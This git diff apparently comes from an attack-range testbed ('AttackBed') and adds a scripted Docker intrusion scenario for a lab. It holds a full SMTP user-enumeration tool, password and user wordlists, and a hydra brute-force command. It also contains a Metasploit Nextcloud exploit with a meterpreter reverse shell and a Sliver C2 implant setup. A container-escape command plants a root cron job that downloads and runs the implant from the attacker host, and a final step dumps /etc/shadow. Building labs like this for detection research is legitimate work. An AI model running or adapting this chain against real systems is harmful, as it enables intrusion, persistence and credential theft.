diff --git a/ansible/ansible.cfg b/ansible/ansible.cfg index e9c38d2a..4467753c 100644 --- a/ansible/ansible.cfg +++ b/ansible/ansible.cfg @@ -102,7 +102,7 @@ roles_path = $LOCAL_PACKAGE_ANSIBLE_PATH/roles #sudo_flags = -H -S -n # SSH timeout -#timeout = 10 +timeout = 30 # default user to use for playbooks if user is not specified # (/usr/bin/ansible will use current user as default) diff --git a/ansible/deploy/attacker/sliver.yml b/ansible/deploy/attacker/sliver.yml new file mode 100644 index 00000000..430fe15e --- /dev/null +++ b/ansible/deploy/attacker/sliver.yml @@ -0,0 +1,7 @@ +- name: Install Attacker Host + become: true + hosts: 10.110.0.211 + roles: + - role: sliver + vars: + sliver_user: ubuntu diff --git a/ansible/run/scenario7/files/smtp-pass.txt b/ansible/run/scenario7/files/smtp-pass.txt new file mode 100644 index 00000000..d84486e6 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-pass.txt @@ -0,0 +1,100 @@ +windows2000 14:18:03 [1906/1906] +3830182 +tristan01 +964123 +chrisp +0825 +445566a +witchy +thickness +020181 +polk +sexyback12 +ihateyou9 +nate01 +vivayo +alex1972 +mimi88 +JENNY +01071975 +235 +akoako +zztop +courtney22 +01011959 +punk14 +loser17 +applejack1 +18111976 +spencer13 +841015 +meeko +becca2 +rockhopper +skyliner33 +amanda86 +071198 +iloveyou97 +bullshit7 +homie12 +djeter +chick2 +gupta +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +poopdick +200375 +cowboy88 +22041977 +mxyzptlk +arsch123 +dsadsadsa +11111p +chinaman1 +sparky101 +holly22 +panthers13 +michael84 +arcticcat +mcbride +alice123alice! +200375 +170876 +richman1 +acuario1 +jayann +30091978 +nguyen4 +COWBOYS +ttt111 +milan7 +loveday +TINKERBELL +utythfk +15011977 +kieran123 +bike4life +3690 +lisa14 +nicolina +duke07 +199308 +internet01 +851210 +usher2 +burnley1 +170376 +akmaral +811023 +charing diff --git a/ansible/run/scenario7/files/smtp-user-enum.pl b/ansible/run/scenario7/files/smtp-user-enum.pl new file mode 100755 index 00000000..5c9e4f3d --- /dev/null +++ b/ansible/run/scenario7/files/smtp-user-enum.pl @@ -0,0 +1,411 @@ +#!/usr/bin/perl -w +# smtp-user-enum - Brute Force Usernames via EXPN/VRFY/RCPT TO +# Copyright (C) 2008 pentestmonkey@pentestmonkey.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 as +# published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License along +# with this program; if not, write to the Free Software Foundation, Inc., +# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. +# +# This tool may be used for legal purposes only. Users take full responsibility +# for any actions performed using this tool. If these terms are not acceptable to +# you, then do not use this tool. +# +# You are encouraged to send comments, improvements or suggestions to +# me at smtp-user-enum@pentestmonkey.net +# +# This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind ) +# + +use strict; +use Socket; +use IO::Handle; +use IO::Select; +use IO::Socket::INET; +use Getopt::Std; +$| = 1; + +my $VERSION = "1.2"; +my $debug = 0; +my @child_handles = (); +my $verbose = 0; +my $max_procs = 5; +my $smtp_port = 25; +my @usernames = (); +my @hosts = (); +my $recursive_flag = 1; +my $query_timeout = 5; +my $mode = "VRFY"; +my $from_address = 'user@example.com'; +my $start_time = time(); +my $end_time; +my $kill_child_string = "\x00"; +$SIG{CHLD} = 'IGNORE'; # auto-reap +my %opts; +my $usage=<; +} + +if (defined($host_file)) { + open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n"; + @hosts = map { chomp($_); $_ } ; +} + +if (defined($username)) { + push @usernames, $username; +} + +if (defined($host)) { + push @hosts, $host; +} + +if (defined($host_file) and not @hosts) { + print "ERROR: Targets file $host_file was empty\n"; + exit 1; +} + +if (defined($username_file) and not @usernames) { + print "ERROR: Username file $username_file was empty\n"; + exit 1; +} + +print "Starting smtp-user-enum v$VERSION ( http://pentestmonkey.net/tools/smtp-user-enum )\n"; +print "\n"; +print " ----------------------------------------------------------\n"; +print "| Scan Information |\n"; +print " ----------------------------------------------------------\n"; +print "\n"; +print "Mode ..................... $mode\n"; +print "Worker Processes ......... $max_procs\n"; +print "Targets file ............. $host_file\n" if defined($host_file); +print "Usernames file ........... $username_file\n" if defined($username_file); +print "Target count ............. " . scalar(@hosts) . "\n" if @hosts; +print "Username count ........... " . scalar(@usernames) . "\n" if @usernames; +print "Target TCP port .......... $smtp_port\n"; +print "Query timeout ............ $query_timeout secs\n"; +print "Target domain ............ $domain\n" if defined($domain); +print "\n"; +print "######## Scan started at " . scalar(localtime()) . " #########\n"; + +# Spawn off correct number of children +foreach my $proc_count (1..$max_procs) { + socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; + $child->autoflush(1); + $parent->autoflush(1); + + # Parent executes this + if (my $pid = fork) { + close $parent; + print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug; + push @child_handles, $child; + + # Child executes this + } else { + close $child; + while (1) { + my $timed_out = 0; + + # Read host and username from parent + my $line = <$parent>; + chomp($line); + my ($host, $username, $domain) = $line =~ /^(\S+)\t(.*)\t(.*)$/; + + # Append domain to username if a domain was supplied + $username = $username . "@" . $domain if (defined($domain) and $domain); + + # Exit if told to by parent + if ($line eq $kill_child_string) { + print "[Child $$] Exiting\n" if $debug; + exit 0; + } + + # Sanity check host and username + if (defined($host) and defined($username)) { + print "[Child $$] Passed host $host and username $username\n" if $debug; + } else { + print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n"; + next; + } + + # Do smtp query with timeout + my $response; + eval { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $query_timeout; + my $s = IO::Socket::INET->new( PeerAddr => $host, + PeerPort => $smtp_port, + Proto => 'tcp' + ) + or die "Can't connect to $host:$smtp_port: $!\n"; + my $buffer; + $s->recv($buffer, 10000); # recv banner + if ($mode eq "VRFY") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("VRFY $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "EXPN") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("EXPN $username\r\n"); + $s->recv($buffer, 10000); + } elsif ($mode eq "RCPT") { + $s->send("HELO x\r\n"); + $s->recv($buffer, 10000); + $s->send("MAIL FROM:$from_address\r\n"); + $s->recv($buffer, 10000); + $s->send("RCPT TO:$username\r\n"); + $s->recv($buffer, 10000); + } else { + print "ERROR: Unknown mode in use\n"; + exit 1; + } + $response .= $buffer; + alarm 0; + }; + +# if ($@) { +# $timed_out = 1; +# print "[Child $$] Timeout for username $username on host $host\n" if $debug; +# } + + my $trace; + if ($debug) { + $trace = "[Child $$] $host: $username "; + } else { + $trace = "$host: $username "; + } + + if ($response and not $timed_out) { + + # Negative result + if ($response =~ /5\d\d \S+/s) { + print $parent $trace . "\n"; + next; + + # Postive result + } elsif ($response =~ /2\d\d \S+/s) { + print $parent $trace . "exists\n"; + next; + + # Unknown response + } else { + $response =~ s/[\n\r]/./g; + print $parent $trace . "$response\n"; + next; + } + } + + if ($timed_out) { + print $parent $trace . "\n"; + } else { + if (!$response) { + print $parent $trace . "\n"; + } + } + } + exit; + } +} + +# Fork once more to make a process that will us usernames and hosts +socketpair(my $get_next_query, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!"; +$get_next_query->autoflush(1); +$parent->autoflush(1); + +# Parent executes this +if (my $pid = fork) { + close $parent; + +# Chile executes this +} else { + # Generate queries from username-host pairs and send to parent + foreach my $username (@usernames) { + foreach my $host (@hosts) { + my $query = $host . "\t" . $username . "\t" . $domain; + print "[Query Generator] Sending $query to parent\n" if $debug; + print $parent "$query\n"; + } + } + + exit 0; +} + +printf "Created %d child processes\n", scalar(@child_handles) if $debug; +my $s = IO::Select->new(); +my $s_in = IO::Select->new(); +$s->add(@child_handles); +$s_in->add(\*STDIN); +my $timeout = 0; # non-blocking +my $more_queries = 1; +my $outstanding_queries = 0; +my $query_count = 0; +my $result_count = 0; + +# Write to each child process once +writeloop: foreach my $write_handle (@child_handles) { + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $write_handle "$query\n"; + $outstanding_queries++; + } else { + print "[Parent] Quitting main loop. All queries have been read.\n" if $debug; + last writeloop; + } +} + +# Keep reading from child processes until there are no more queries left +# Write to a child only after it has been read from +mainloop: while (1) { + # Wait until there's a child that we can either read from or written to. + my ($rh_aref) = IO::Select->select($s, undef, undef); # blocking + + print "[Parent] There are " . scalar(@$rh_aref) . " children that can be read from\n" if $debug; + + foreach my $read_handle (@$rh_aref) { + # Read from child + chomp(my $line = <$read_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + $outstanding_queries--; + $query_count++; + + # Write to child + my $query = <$get_next_query>; + if ($query) { + chomp($query); + print "[Parent] Sending $query to child\n" if $debug; + print $read_handle "$query\n"; + $outstanding_queries++; + } else { + print "DEBUG: Quitting main loop. All queries have been read.\n" if $debug; + last mainloop; + } + } +} + +# Wait to get replies back from remaining children +my $count = 0; +readloop: while ($outstanding_queries) { + my @ready_to_read = $s->can_read(1); # blocking + foreach my $child_handle (@ready_to_read) { + print "[Parent] Outstanding queries: $outstanding_queries\n" if $debug; + chomp(my $line = <$child_handle>); + if ($verbose == 1 or $debug == 1 or not ($line =~ // or $line =~ /no result/ or $line =~ //)) { + print "$line\n"; + $result_count++ unless ($line =~ // or $line =~ /no result/ or $line =~ //); + } + print $child_handle "$kill_child_string\n"; + $s->remove($child_handle); + $outstanding_queries--; + $query_count++; + } +} + +# Tell any remaining children to exit +foreach my $handle ($s->handles) { + print "[Parent] Telling child to exit\n" if $debug; + print $handle "$kill_child_string\n"; +} + +# Wait for all children to terminate +while(wait != -1) {}; + +print "######## Scan completed at " . scalar(localtime()) . " #########\n"; +print "$result_count results.\n"; +print "\n"; +$end_time = time(); # Second granularity only to avoid depending on hires time module +my $run_time = $end_time - $start_time; +$run_time = 1 if $run_time < 1; # Avoid divide by zero +printf "%d queries in %d seconds (%0.1f queries / sec)\n", $query_count, $run_time, $query_count / $run_time; diff --git a/ansible/run/scenario7/files/smtp-user.txt b/ansible/run/scenario7/files/smtp-user.txt new file mode 100644 index 00000000..573755f5 --- /dev/null +++ b/ansible/run/scenario7/files/smtp-user.txt @@ -0,0 +1,21 @@ +david@attackbed.com +alex@attackbed.com +maria@attackbed.com +john@attackbed.com +marco@attackbed.com +andrea@attackbed.com +peter@attackbed.com +daniel@attackbed.com +cathy@attackbed.com +antonio@attackbed.com +bob@attackbed.com +roberta@attackbed.com +cedric@attackbed.com +cynthia@attackbed.com +paul@attackbed.com +alice@attackbed.com +dora@attackbed.com +admin@attackbed.com +james@attackbed.com +sales@attackbed.com +office@attackbed.com diff --git a/ansible/run/scenario7/gather.yml b/ansible/run/scenario7/gather.yml new file mode 100644 index 00000000..ff35bf18 --- /dev/null +++ b/ansible/run/scenario7/gather.yml @@ -0,0 +1,86 @@ +- hosts: inetfw + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_configs: + - src: /var/lib/suricata + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/ossec.conf + + kyoushi_gather_logs: + - src: /var/log + recursive: true + + +- hosts: docker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /opt/nextcloud/log + - /opt/nextcloud/nclog + - /var/lib/docker/containers + recursive: true + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /opt/nextcloud + recursive: true + exclude: + - "/opt/nextcloud/dump.sql" + - "/opt/nextcloud/log" + - src: /var/ossec/etc/ossec.conf + + +- hosts: attacker + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - /home/aecid/attackmate.log + - /home/aecid/output.log + - /home/aecid/attackmate.json + - src: /var/log + recursive: true + + kyoushi_gather_configs: + - src: /home/aecid/scenario*.yml + - src: /var/www/html + recursive: true + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + +- hosts: wazuh + roles: + - kyoushi-gather + vars: + kyoushi_gather_ignore_errors: yes + kyoushi_gather_logs: + - src: /var/ossec/logs/alerts + recursive: true + + kyoushi_gather_configs: + - src: /etc + recursive: true + exclude: + - "/etc/runit " + - "/etc/sv " + - src: /var/ossec/etc/shared + recursive: true diff --git a/ansible/run/scenario7/main.yml b/ansible/run/scenario7/main.yml new file mode 100644 index 00000000..6cfb5eb0 --- /dev/null +++ b/ansible/run/scenario7/main.yml @@ -0,0 +1,135 @@ + +- name: Retstart dnsmasq on inetdns + hosts: inetdns + become: true + tasks: + - name: stop dnsmasq + ansible.builtin.service: + name: dnsmasq + state: stopped + tags: + - playbooks + + - name: Configure public DNS + ansible.builtin.copy: + content: "address=/faaacebook.com/192.42.1.174\n" + owner: root + dest: /etc/dnsmasq.d/attacker.conf + # delegate_to: inetdns + tags: + - playbooks + + - name: start dnsmasq + ansible.builtin.service: + name: dnsmasq + state: started + tags: + - playbooks + +- name: Install Attacker Host + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + tasks: + - name: get user home directory + ansible.builtin.shell: > + getent passwd {{ attacker_user }} | awk -F: '{ print $6 }' + changed_when: false + register: user_home + tags: + - metasploit + - exploit + - config + - install + - git + - attackmate + - playbooks + + - name: Ensure delay before commands + ansible.builtin.replace: + path: /etc/attackmate.yml + regexp: 'command_delay: 0' + replace: 'command_delay: 15' + backup: yes + become: true + tags: + - playbooks + + +- name: Install Attacker Host Part 2 + hosts: attacker + become: true + vars: + attacker_user: aecid + attacker_ip: 192.42.1.174 + # delay_before_attack: 600 + delay_before_attack: 0 + tasks: + - name: Install docker.io + apt: + name: docker.io + state: present + tags: + - playbooks + + - name: Copy smtp-enum + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user-enum.pl" + dest: "{{user_home.stdout}}/smtp-user-enum.pl" + mode: '0755' + tags: + - playbooks + + - name: Copy smtp-user-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-user.txt" + dest: "{{user_home.stdout}}/smtp-user.txt" + mode: '0744' + tags: + - playbooks + + - name: Copy smtp-pass-wordlist + become: True + become_user: "{{attacker_user}}" + ansible.builtin.copy: + src: "smtp-pass.txt" + dest: "{{user_home.stdout}}/smtp-pass.txt" + mode: '0744' + tags: + - playbooks + + + - name: Copy playbooks + become: True + become_user: "{{attacker_user}}" + ansible.builtin.template: + src: "{{ item }}.j2" + dest: "{{user_home.stdout}}/{{ item }}.yml" + mode: '0755' + loop: + - scenario_7 + tags: + - metasploit + - attackmate + - exploit + - config + - install + - playbooks + + - name: "Run Scenario 7" + become: True + become_user: "{{attacker_user}}" + ansible.builtin.shell: + cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux \"--json\" scenario_7.yml" + chdir: "{{user_home.stdout}}" + tags: + - scenario_7 + - metasploit + - attackmate + - exploit diff --git a/ansible/run/scenario7/templates/scenario_7.j2 b/ansible/run/scenario7/templates/scenario_7.j2 new file mode 100755 index 00000000..4fdba40e --- /dev/null +++ b/ansible/run/scenario7/templates/scenario_7.j2 @@ -0,0 +1,197 @@ +#################### +# +# Scenario 7 +# +#################### +vars: + $SERVER_ADDRESS: 192.42.0.254 + $MAIL_HOST: mail.attackbed.com + $ATTACKER_ADDRESS: 192.42.1.174 + DOMAIN: attackbed.com + PAYLOAD_DOCKER: cmd/linux/http/x64/meterpreter/reverse_tcp + DNS_LIST: /usr/local/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt + +commands: + - type: shell + cmd: dnsenum -f $DNS_LIST --dnsserver 192.42.0.233 $DOMAIN + metadata: + techniques: "T1590.002,T1591" + tactics: "Reconnaissance" + technique_name: "Gather Victim Network Information: DNS,Gather Victim Org Information" + description: "Enumerate subdomains of corporate domain-zone" + + + - type: shell + cmd: ./smtp-user-enum.pl -M VRFY -U smtp-user.txt -t $MAIL_HOST + metadata: + techniques: "T1589.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Identity Information: Email Addresses" + description: "Enumerate email addresses on SMTP-Host" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: hydra -l "alice@$DOMAIN" -P smtp-pass.txt -c 5 -s 143 $MAIL_HOST imap + metadata: + techniques: "T1078.002,T1110.001,T1133" + tactics: "Initial Access" + technique_name: "Valid Accounts: Local Accounts, Brute Force: Password Guessing, External Remote Services" + description: "Brute-force IMAP-password using the already enumerated username" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: http-client + url: http://$SERVER_ADDRESS:8080 + metadata: + techniques: "T1592.002" + tactics: "Reconnaissance" + technique_name: "Gather Victim Host Information: Software" + description: "Attacker connects to webport to find out about nextcloud" + + - type: sliver + cmd: "generate_implant" + c2url: "https://faaacebook.com" + name: "badimplant" + metadata: + description: "Generate implant for the persistence on the container-host" + + - type: sliver + cmd: start_https_listener + host: 0.0.0.0 + port: 443 + metadata: + techniques: "T1071.001,T1573.001" + tactics: "Command and Control" + technique_name: "Application Layer Protocol: Web Protocols,Encrypted Channel: Symmetric Cryptography" + description: "Start a listener for the sliver implant" + + - type: webserv + local_path: $LAST_SLIVER_IMPLANT + port: 8888 + background: True + kill_on_exit: true + metadata: + description: "Serve the sliver implant for installation" + + - type: msf-module + cmd: exploit/unix/webapp/nextcloud_workflows_rce + creates_session: "foothold" + options: + RHOSTS: "$SERVER_ADDRESS" + RPORT: "8080" + USERNAME: "alice" + PASSWORD: "alice123alice!" + WfsDelay: "380000" + payload_options: + LHOST: "192.42.1.174" + LPORT: "4444" + payload: "cmd/linux/http/x64/meterpreter/reverse_tcp" + metadata: + tactics: "Initial Access, Execution,Command and Control" + techniques: "T1190,T1059.004,T1095" + description: "Attacker exploits an authenticated vulnerability in nextcloud and executes a meterpreter shell" + + + - type: msf-session + session: "foothold" + stdapi: True + cmd: getuid + metadata: + techniques: "T1033" + tactics: "Discovery" + description: "Attacker discovers user id" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: msf-session + session: "foothold" + stdapi: True + cmd: portfwd add -l 1090 -p 2375 -r 172.18.0.1 + metadata: + description: "Attacker starts port-forwarding for further attacks on the exposed docker-daemon" + + - type: shell + cmd: docker -H tcp://localhost:1090 ps + metadata: + techniques: "T1057" + tactics: "Discovery" + description: "Attacker asks docker-daemon for running containers" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + + - type: shell + cmd: docker -H tcp://localhost:1090 network list + metadata: + techniques: "T1016 " + tactics: "Discovery" + description: "Attacker discovers docker-networks using the exposed docker-daemon" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: shell + cmd: docker -H tcp://localhost:1090 run --rm -t -u root --network=nextcloud_default -v /etc:/root/etc kalilinux/kali-rolling bash -c "echo \"*/5 * * * * root test -e /opt/tool || curl http://$ATTACKER_ADDRESS:8888/tool > /opt/tool && chmod +x /opt/tool && /opt/tool\" > /root/etc/cron.d/sysvz" + metadata: + techniques: "T1610,T1525,T1053.003,T1210" + tactics: "Defense Evasion,Execution,Persistence,Privilege Escalation,Lateral Movement" + description: "Attacker mounts etc-directory of the host into a container and creates a cron-job in it that executes the sliver-implant as root outside of the container" + + + - type: sliver-session + cmd: ls + remote_path: "." + session: badimplant + metadata: + techniques: "T1083" + tactics: "Discovery" + technique_name: "File and Directory Discovery" + description: "Use sliver to list files after container-escape" + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: ps + session: badimplant + metadata: + techniques: "T1057" + tactics: "Discovery" + technique_name: "Process Discovery" + description: "Use sliver to list processes after container-escape" + + - type: mktemp + variable: SHADOW + + - type: sleep + seconds: 30 + min_sec: 5 + random: true + + - type: sliver-session + cmd: download + remote_path: /etc/shadow + local_path: $SHADOW + session: badimplant + metadata: + techniques: "T1003.008,T1041" + tactics: "Credential Access,Collection,Exfiltration" + technique_name: "OS Credential Dumping: /etc/passwd and /etc/shadow,Exfiltration Over C2 Channel" + description: "Use sliver to dump /etc/shadow credentials" diff --git a/docs/images/AttackBed-Docker.drawio b/docs/images/AttackBed-Docker.drawio new file mode 100644 index 00000000..d9e3b88f --- /dev/null +++ b/docs/images/AttackBed-Docker.drawio @@ -0,0 +1,113 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/docs/images/AttackBed-Docker.drawio.png b/docs/images/AttackBed-Docker.drawio.png new file mode 100644 index 00000000..f9d08557 Binary files /dev/null and b/docs/images/AttackBed-Docker.drawio.png differ diff --git a/docs/source/development/firewall.rst b/docs/source/development/firewall.rst index ec343e3f..3c13f813 100644 --- a/docs/source/development/firewall.rst +++ b/docs/source/development/firewall.rst @@ -33,6 +33,7 @@ Key Host IPs from configuration: * **LINUXSHARE**: ``192.168.100.23`` (lan) * **VIDEOSERVER**: ``172.17.100.121`` (dmz) * **KAFKA**: ``192.168.100.10`` (lan) +* **CLOUD**: ``172.17.100.125`` (dmz) * **Firewall (inetfw)**: Public IP ``192.42.0.254`` (for knocking, from scenario 4), Internal IPs on respective zone interfaces. * **Attacker**: ``192.42.1.174`` (inet) * **inetdns**: Public DNS server, delegates requests for ``faaacebook.com``, ``facebock.com``, ``dailynews-wire.com`` to Attacker IP. @@ -50,9 +51,9 @@ Scenario 1: Videoserver / ZoneMinder Exploit This scenario targets the ZoneMinder service running on the ``VIDEOSERVER`` in the DMZ. -* **Reconaissance (DNS Enumeration):** - ``inet (Attacker) -> fw`` | TCP Top 100 Ports | Attacker performs nmap scan to firewall IP (top 100 ports even if fhe ports are not open) * **Reconaissance (Host/Service Scanning):** + ``inet (Attacker) -> fw`` | TCP Top 100 Ports | Attacker performs nmap scan to firewall IP (top 100 ports even if fhe ports are not open) +* **Reconaissance (DNS Enumeration):** ``inet (Attacker) -> inet (CorpsDNS)`` | UDP/TCP Port 53 | Attacker performs DNS enumeration * **Initial Access & Exploitation:** ``inet (Attacker) -> dmz (VIDEOSERVER)`` | TCP Port 80 | (DNAT) - Attacker accesses the ZoneMinder web interface via the firewall's public IP, forwarded to the ``VIDEOSERVER``. @@ -115,8 +116,6 @@ Scenario 2: Linux Malware This scenario involves exploiting a vulnerability on the ``VIDEOSERVER``, using DNS redirection and privilege escalation techniques. -* **DNS Redirection Setup:** - ``inet (Attacker) -> inetdns`` | (Configuration Task) - Attacker configures `inetdns` to resolve ``faaacebook.com`` to the Attacker's IP. * **Initial Access & Exploitation:** ``inet (Attacker) -> dmz (VIDEOSERVER)`` | TCP Port 80 | (DNAT) - Initial interaction with the ``VIDEOSERVER`` web service. * **DNS Lookups:** @@ -137,11 +136,6 @@ This scenario involves exploiting a vulnerability on the ``VIDEOSERVER``, using - Destination - Protocol / Port - Firewall Rule/Policy - * - DNS Setup - - ``inet (Attacker)`` - - ``inetdns`` - - N/A - - Config Task * - Initial Access - ``inet (Attacker)`` - ``dmz (VIDEOSERVER)`` @@ -417,3 +411,91 @@ This scenario involves tricking a user on the `client` machine (in the `user` zo - ``inet (Attacker IP)`` - TCP 21114-8, 8000; UDP 21116 - RULE + +Scenario 7: Docker +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +In this scenario attacker gains remote code execution via a nextcloud exploit inside a docker container and elevates the privileges using an exposed docker-daemon to gain root access on the docker host. + +* **Reconaissance (DNS Enumeration):** + ``inet (Attacker) -> inet (CorpsDNS)`` | UDP/TCP Port 53 | Attacker performs DNS enumeration +* **Reconaissance (SMTP Enumeration):** + ``inet (Attacker) -> fw`` | TCP Port 25 | Attacker enumerates possible usernames using SMTP +* **Initial Access (Credential Attack):** + ``inet (Attacker) -> fw`` | TCP Port 143 | Attacker brute forces password for IMAP-User +* **Reconaissance (HTTP Title):** + ``inet (Attacker) -> dmz (CLOUD)`` | TCP Port 8080 | (DNAT) - Attacker accesses the Nextcloud web interface via the firewall's public IP, forwarded to the ``CLOUD``. +* **Initial Access & Exploitation:** + ``inet (Attacker) -> dmz (CLOUD)`` | TCP Port 8080 | (DNAT) - Attacker accesses the Nextcloud web interface via the firewall's public IP, forwarded to the ``CLOUD`` and exploits a command injection vulnerability. +* **Command and Control (Reverse Shell-Staged):** + ``dmz (CLOUD) -> inet (Attacker)`` | TCP Port (e.g. 8080 or 8081) | (POLICY: `dmz -> inet ACCEPT`) - Meterpreter reverse shell download initiated from the compromised ``CLOUD`` back to the attacker's listener. +* **Command and Control (Reverse Shell):** + ``dmz (CLOUD) -> inet (Attacker)`` | TCP Port (e.g. 4444) | (POLICY: `dmz -> inet ACCEPT`) - Meterpreter reverse shell connection initiated from the compromised ``CLOUD`` back to the attacker's listener. +* **Payload Download:** + ``dmz (CLOUD) -> inet (Attacker)`` | TCP Port 8888 | (POLICY: `dmz -> inet ACCEPT`) - Compromised ``CLOUD`` downloads sliver-implant from the attacker's web server to escape from container. +* **Post-Exploitation (Sliver):** + ``dmz (CLOUD) -> inet (Attacker)`` | TCP Port 443 | (POLICY: `dmz -> inet ACCEPT`) - Sliver-Implant connects back using domain `https://faaacebook.com` to establish reverse-connection for the attacker. +* **DNS Lookups:** + ``dmz (CLOUD) -> fw`` | TCP/UDP Port 53 | (RULE: `DNS/ACCEPT`) - ``CLOUD`` performing DNS lookups via the firewall. + +.. list-table:: Scenario 7 Firewall Connections + :widths: 25 20 20 15 20 + :header-rows: 1 + + * - Phase / Action + - Source + - Destination + - Protocol / Port + - Firewall Rule/Policy + * - Reconaissance + - ``inet (Attacker)`` + - ``inet`` (CorpsDNS)`` + - TCP 53 + - N/A + * - Reconaissance + - ``inet (Attacker)`` + - ``dmz (CLOUD)`` + - TCP 25 + - DNAT + * - Initial Access + - ``inet (Attacker)`` + - ``dmz (CLOUD)`` + - TCP 143 + - DNAT + * - Reconaissance + - ``inet (Attacker)`` + - ``dmz (CLOUD)`` + - TCP 8080 + - DNAT + * - Initial Access + - ``inet (Attacker)`` + - ``dmz (CLOUD)`` + - TCP 8080 + - DNAT + * - Command & Control + - ``dmz (CLOUD)`` + - ``inet (Attacker)`` + - TCP 8080 + - POLICY: ``dmz -> inet ACCEPT`` + * - Command & Control + - ``dmz (CLOUD)`` + - ``inet (Attacker)`` + - TCP 4444 + - POLICY: ``dmz -> inet ACCEPT`` + * - Payload Download + - ``dmz (CLOUD)`` + - ``inet (Attacker)`` + - TCP 8888 + - POLICY: ``dmz -> inet ACCEPT`` + * - Post-Exploitation Sliver + - ``dmz (CLOUD)`` + - ``inet (Attacker)`` + - TCP 443 + - POLICY: ``dmz -> inet ACCEPT`` + * - DNS Lookup + - ``dmz (CLOUD)`` + - ``fw`` + - TCP/UDP 53 + - RULE: ``DNS/ACCEPT`` + + diff --git a/docs/source/index.rst b/docs/source/index.rst index d5a03d18..e48a0973 100644 --- a/docs/source/index.rst +++ b/docs/source/index.rst @@ -43,6 +43,7 @@ AttackBed Documentation scenarios/network scenarios/lanturtle scenarios/client + scenarios/docker .. toctree:: :maxdepth: 1 diff --git a/docs/source/scenarios/docker.rst b/docs/source/scenarios/docker.rst new file mode 100644 index 00000000..92689b96 --- /dev/null +++ b/docs/source/scenarios/docker.rst @@ -0,0 +1,23 @@ +=================== +Docker (Scenario 7) +=================== + +.. image:: ../../images/AttackBed-Docker.drawio.png + +Attacker Steps: +--------------- + +1. Attacker enumerates subdomains of corporate domain-zone(T1590.002,T1591) +2. Attacker scans Host with smtp-enum(T1589.002) +3. Attacker brute-forces imap using the already enumerated username(T1078.002,T1110.001,T1133) +4. Attacker connects to webport to find out about nextcloud(T1592.002) +5. Attacker exploits nextcloud using a compromised acccount(T1586) which runs inside a container(T1190,T1059.004,T1095) +6. Attacker discovers user-id(T1033) +7. Attacker asks exposed docker-daemon for running containers(T1057) +8. Attacker discovers docker-networks using the exposed docker-daemon(T1016) +9. Attacker breaks out using exposed docker-daemon-api and schedules execution of sliver-malware(T1610,T1525,T1053.003,T1210) +10. Attacker uses sliver to list files after container-escape(T1083) +11. Attacker uses sliver to list processes after container-escape(T1057) +12. Attacker uses sliver to dump /etc/shadow credentials(T1003.008,T1041) + + diff --git a/packer/attacker/playbook/main.yaml b/packer/attacker/playbook/main.yaml index 7cabf828..79964b08 100644 --- a/packer/attacker/playbook/main.yaml +++ b/packer/attacker/playbook/main.yaml @@ -56,13 +56,9 @@ vars: aecidtools_user: "{{attacker_user}}" - role: postexploit - - role: l50.sliver + - role: sliver vars: - server_path: "/home/{{attacker_user}}/sliver-server" - client_path: /usr/local/bin/sliver - sliver_service_path: /etc/systemd/system/sliver.service - sliver_client_config_path: "/home/{{attacker_user}}/.sliver-client/configs" - setup_systemd: true + server_user: "{{attacker_user}}" - role: metasploit vars: metasploit_user: "{{attacker_user}}" @@ -71,6 +67,7 @@ metasploit_rpcpassword: hackerman - role: attackmate vars: + attackmate_version: development attackmate_msf_server: 